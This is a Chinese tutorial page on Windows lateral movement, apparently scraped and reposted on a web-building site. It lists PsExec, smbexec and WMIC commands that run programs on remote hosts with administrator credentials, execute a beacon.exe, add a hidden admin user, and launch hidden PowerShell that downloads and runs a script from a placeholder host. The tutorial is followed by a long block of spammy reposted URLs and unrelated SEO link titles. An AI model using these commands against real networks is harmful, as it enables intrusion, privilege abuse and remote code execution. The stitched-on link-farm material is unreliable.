当前位置: 首页 > wzjs >正文

全平台响应式网站建设wordpress 改网址

全平台响应式网站建设,wordpress 改网址,网站优化对企业有什么好处,网站建设人力资源分配横向移动(下) 其他横向工具介绍 横向移动还有很多其他方法和工具,接下来再为大家介绍一些工具及其用法 Psexec工具横向移动 psexec是windows下非常好的一款远程命令行工具,他是微软提供的pstools命令中的一个,psexec的使用不需要对方主机开启…

横向移动(下)

其他横向工具介绍

横向移动还有很多其他方法和工具,接下来再为大家介绍一些工具及其用法

Psexec工具横向移动

psexec是windows下非常好的一款远程命令行工具,他是微软提供的pstools命令中的一个,psexec的使用不需要对方主机开启3389端口,只需要对方开启admin$ 共享和IPC共享和IPC共享和IPC(该共享默认开启,依赖于445端口),就是要开启445和135端口,如果没有开启,psexec也是不能使用的

工具下载地址:

https://docs.microsoft.com/zh-cn/sysinternals/downloads/pstools

image-20250716220215785

Psexec工具使用:

psexec \\ip -u administrator -p admin cmd 进入半交互式shell
psexec -accepteula \\ip -s cmd.exe 建立交互的shell
psexec \\ip -u administrator -p admin -w c:\ cmd 进入交互式shell,且c:\\是目标机器的工作目录
psexec \\ip -u administrator -p admin whoami all 执行命令
psexec \\ip -u administrator -p admin -d c:\beacon.exe 执行文件
psexec \\ip -u administrator -p admin -h -d c:\beacon.exe UAC的用户权限执行文件

更多使用方法:https://learn.microsoft.com/zh-cn/sysinternals/downloads/psexec

SMB工具横向移动

smbexec.exe 用户名:密码@ip

image-20250630213506835

SMBEXEC工作原理:

1、建立IPC$连接

2、通过服务执行命令

3、将命令放在%temp%/execute.bat中

4、运行execute.bat文件,将结果存储在C:/_output文件中

5、删除execute.bat

通过客户端读取目标机器的C:/_output文件中的内容

%COMSPEC% /Q /c echo whoami ^> \\127.0.0.1\C$\_output 2^>^&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.batecho whoami

WMI横向移动命令(135端口)

WIMI是Windows在Powershell还没发布前,微软用来管理Windows系统的重要的数据库工具,他本身的组织架构是一个数据库架构,WMI服务使用DCOM或WinRM协议,在使用wmiexec进行横向移动时,Windows操作系统默认不会将WMI的操作记录在日志中

wmic /?
1、执行命令并且输出
wmic /node:IP地址 /user:本地用户管理员/域管理员 /password:密码 process call create "cmd.exe /c ipconfig >c:\ip.txt"
2、列出远程主机进程
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process list brief
3、在远程系统上执行bat脚本
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create c:\programdata\test.bat
4、添加用户
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create "cmd.exe /c net user test1!@123QWE /add && net localgroup administrator test1 /add"
5、执行Powershell上线
wmic /node:IP /user:本地用户管理员/域管理员 /password:密码 process call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient),downloadstring('ps脚本地址'))\""
wmic /node:192.168.41.218 /user:administrator /password:Admin@123 PROCESS call create "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://www.xxx.com/uiodsahfbkjds'))\""

文章转载自:

http://6oLhPqDc.mxrrg.cn
http://Sn04Ybri.mxrrg.cn
http://y7MJuAVe.mxrrg.cn
http://TEIj5Jif.mxrrg.cn
http://RQ6LUZ9R.mxrrg.cn
http://YSOj6A2o.mxrrg.cn
http://qDyaQjW4.mxrrg.cn
http://vLrYRPfQ.mxrrg.cn
http://iVM1vayz.mxrrg.cn
http://H0WiiYPa.mxrrg.cn
http://TQA6dslV.mxrrg.cn
http://4EfVe8dK.mxrrg.cn
http://lPvcRaOZ.mxrrg.cn
http://95DrNWtV.mxrrg.cn
http://yPXfnFyd.mxrrg.cn
http://HJNcvV8O.mxrrg.cn
http://Em2r3Ig4.mxrrg.cn
http://nBlPJewc.mxrrg.cn
http://GOYK4f58.mxrrg.cn
http://3qwi5tsk.mxrrg.cn
http://piAA2WEI.mxrrg.cn
http://JuTslVYW.mxrrg.cn
http://yng608Wh.mxrrg.cn
http://cDlYAxHU.mxrrg.cn
http://xTBfEBhL.mxrrg.cn
http://UDB9jaSB.mxrrg.cn
http://jhey07Ma.mxrrg.cn
http://Y0u8iFWW.mxrrg.cn
http://RDXVlbxX.mxrrg.cn
http://usyngfdd.mxrrg.cn
http://www.dtcms.com/wzjs/610141.html

相关文章:

  • 海沧建设网站多少地图类网站开发实战教程
  • 自己做电商网站做爰全过程网站
  • 关于网站建设中原创文章的一些想法wordpress怎样修改字体
  • p2p网站建设小微金融wordpress二维码登录
  • 网站怎么添加软件松江网站制作
  • 网站优化怎样的百度网站建设怎么联系
  • 爱站网挖掘关键词wordpress 文字排版
  • 百度网站权重排名网站建设 清远魔方网络
  • 公司网站建设维护及使用管理办法爆款引流推广软件
  • 给企业开发网站宜昌网站建设
  • 怎样下载做网站的软件网站建设案例单招网
  • 北京丰台网站建设做网站还是租用服务器
  • 网站建设ppt方案模板重庆巴南区网站开发公司
  • 中启智联网站建设上海做网站搜索一下马来西亚的
  • 重庆市公司网站备案在哪了网站建设常熟
  • 临沂网站建设 百度优化中国工程建设管理协会网站
  • 邯郸贴吧网站苏州app制作
  • 信用网站一体化建设产品网络推广方式
  • 社交平台运营是做什么的株洲企业seo优化
  • 网站的在线支付怎么做深圳住房和建设
  • 请人做网站郑州做网站优化最好的公司
  • linux 网站建设模板阳光城最新消息
  • 上海市建设工程交易中心网站网站建设 提供源码
  • cms网站下载网站子网页设计
  • 建立网站方法网站建设云主机云服务器
  • iis网站搭建网站备案和实际的不同
  • 杭州 网站制作wordpress首页布局
  • 做粘土网站昆明昌盛网络技术有限公司
  • 做网站要那些工具WordPress推荐主机配置
  • 工信部网站备案查询步骤网络推广精准营销推广